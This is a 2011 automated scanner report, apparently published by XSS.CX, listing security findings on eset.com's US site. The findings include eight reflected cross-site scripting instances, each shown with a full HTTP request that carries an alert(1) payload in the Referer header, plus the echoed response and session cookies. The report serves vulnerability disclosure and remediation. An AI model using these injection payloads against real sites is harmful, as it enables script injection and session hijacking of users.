XSS, Cross Site Scripting, CWE-79, CAPEC-86, DORK, www.eset.com

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon Mar 21 08:57:54 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading

1. Cross-site scripting (reflected)

1.1. http://www.eset.com/us/ [Referer HTTP header]

1.2. http://www.eset.com/us/business/products [Referer HTTP header]

1.3. http://www.eset.com/us/company [Referer HTTP header]

1.4. http://www.eset.com/us/download/free-trial/nod32-antivirus [Referer HTTP header]

1.5. http://www.eset.com/us/home [Referer HTTP header]

1.6. http://www.eset.com/us/partners [Referer HTTP header]

1.7. http://www.eset.com/us/store [Referer HTTP header]

1.8. http://www.eset.com/us/styles/store-new.css [Referer HTTP header]

2. Cookie without HttpOnly flag set

2.1. http://www.eset.com/us/

2.2. http://www.eset.com/us/request/jsonp/topsearches.js

2.3. http://www.eset.com/us/styles/store-new.css

3. Password field with autocomplete enabled

4. Referer-dependent response

4.1. http://www.eset.com/us/home/smart-security

4.2. http://www.eset.com/us/store

4.3. http://www.eset.com/us/styles/store-new.css

5. Cross-domain POST

5.1. http://www.eset.com/us/home/smart-security

5.2. http://www.eset.com/us/store

5.3. http://www.eset.com/us/store

5.4. http://www.eset.com/us/store

5.5. http://www.eset.com/us/store

5.6. http://www.eset.com/us/store

5.7. http://www.eset.com/us/store

6. Cross-domain script include

6.1. http://www.eset.com/us/

6.2. http://www.eset.com/us/business/products

6.3. http://www.eset.com/us/company

6.4. http://www.eset.com/us/download

6.5. http://www.eset.com/us/download/free-trial/nod32-antivirus

6.6. http://www.eset.com/us/home

6.7. http://www.eset.com/us/home/smart-security

6.8. http://www.eset.com/us/partners

6.9. http://www.eset.com/us/store

6.10. http://www.eset.com/us/styles/store-new.css

7. Robots.txt file

8. Content type incorrectly stated

8.1. http://www.eset.com/us/scripts/business.js

8.2. http://www.eset.com/us/scripts/common.js

8.3. http://www.eset.com/us/scripts/download.js

8.4. http://www.eset.com/us/scripts/lib/autocompleter/Autocompleter.js

8.5. http://www.eset.com/us/scripts/lib/jq-promo-lib.js

8.6. http://www.eset.com/us/scripts/lib/jq.js

8.7. http://www.eset.com/us/scripts/lib/mbox.js

8.8. http://www.eset.com/us/scripts/lib/mootools-1.2.3-core-yc.js

8.9. http://www.eset.com/us/scripts/lib/mootools-1.2.3.1-more.js

8.10. http://www.eset.com/us/scripts/lib/s_code3.js

8.11. http://www.eset.com/us/scripts/store.js

8.12. http://www.eset.com/us/scripts/trial.js



1. Cross-site scripting (reflected)  next
There are 8 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.eset.com/us/ [Referer HTTP header]  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbba3"-alert(1)-"13ccb9f00ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=bbba3"-alert(1)-"13ccb9f00ef

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=gmu0vfl8sjvbvf7djnvdutc185; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=1; expires=Fri, 20-May-2011 13:45:47 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26609
Date: Mon, 21 Mar 2011 13:45:47 GMT
X-Varnish: 451497610
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=bbba3"-alert(1)-"13ccb9f00ef";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.2. http://www.eset.com/us/business/products [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/products

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8db15"-alert(1)-"97a150dbf0b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/business/products HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=8db15"-alert(1)-"97a150dbf0b

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 19876
Date: Mon, 21 Mar 2011 13:47:14 GMT
X-Varnish: 451503652
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=8db15"-alert(1)-"97a150dbf0b";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.3. http://www.eset.com/us/company [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf139"-alert(1)-"f2e95ea2911 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/company HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715224|session#1300715160014-248282#1300717024|PC#1300715160014-248282.17#1301924764; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.3.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716963989%3B%20gpv_pageName%3Dus/business/products%7C1300716963992%3B%20s_nr%3D1300715163994-New%7C1332251163994%3B%20s_invisit%3Dtrue%7C1300716963998%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=cf139"-alert(1)-"f2e95ea2911

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 14841
Date: Mon, 21 Mar 2011 13:47:17 GMT
X-Varnish: 451503856
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>A
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=cf139"-alert(1)-"f2e95ea2911";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.4. http://www.eset.com/us/download/free-trial/nod32-antivirus [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial/nod32-antivirus

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e653"-alert(1)-"cfe30951abc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/download/free-trial/nod32-antivirus HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715230|session#1300715160014-248282#1300717030|PC#1300715160014-248282.17#1301924770; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.7.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716972086%3B%20gpv_pageName%3Dus/company%7C1300716972094%3B%20s_nr%3D1300715172098-New%7C1332251172098%3B%20s_invisit%3Dtrue%7C1300716972103%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=9e653"-alert(1)-"cfe30951abc

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 20852
Date: Mon, 21 Mar 2011 13:47:39 GMT
X-Varnish: 451505630
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=9e653"-alert(1)-"cfe30951abc";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.5. http://www.eset.com/us/home [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49cfe"-alert(1)-"b5004fc1d1a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/home HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=49cfe"-alert(1)-"b5004fc1d1a

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17297
Date: Mon, 21 Mar 2011 13:47:03 GMT
X-Varnish: 451502625
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>I
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=49cfe"-alert(1)-"b5004fc1d1a";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.6. http://www.eset.com/us/partners [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/partners

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 622d1"-alert(1)-"2b6c22d85e2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/partners HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1300715224|session#1300715160014-248282#1300717024|PC#1300715160014-248282.17#1301924764; __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.3.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716963989%3B%20gpv_pageName%3Dus/business/products%7C1300716963992%3B%20s_nr%3D1300715163994-New%7C1332251163994%3B%20s_invisit%3Dtrue%7C1300716963998%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=622d1"-alert(1)-"2b6c22d85e2

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13381
Date: Mon, 21 Mar 2011 13:47:26 GMT
X-Varnish: 451504585
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Partners";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=622d1"-alert(1)-"2b6c22d85e2";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.7. http://www.eset.com/us/store [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e840f"-alert(1)-"a5c74f05597 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762
Referer: http://www.google.com/search?hl=en&q=e840f"-alert(1)-"a5c74f05597

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38204
Date: Mon, 21 Mar 2011 13:47:37 GMT
X-Varnish: 451505531
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
n
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=e840f"-alert(1)-"a5c74f05597";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.8. http://www.eset.com/us/styles/store-new.css [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/styles/store-new.css

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25ffd"-alert(1)-"abb6facb5f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/styles/store-new.css HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=25ffd"-alert(1)-"abb6facb5f7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.1.10.1300715138; s_pers=%20s_visit%3D1%7C1300716937595%3B%20gpv_pageName%3Dus/new_homepage%7C1300716937597%3B%20s_nr%3D1300715137599-New%7C1332251137599%3B%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_invisit%3Dtrue%7C1300716937601%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715221|session#1300715160014-248282#1300717021|PC#1300715160014-248282.17#1301924762

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 21-Mar-2010 13:47:28 GMT
Set-Cookie: tnt=2; expires=Fri, 20-May-2011 13:47:29 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26609
Date: Mon, 21 Mar 2011 13:47:29 GMT
X-Varnish: 451504859
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

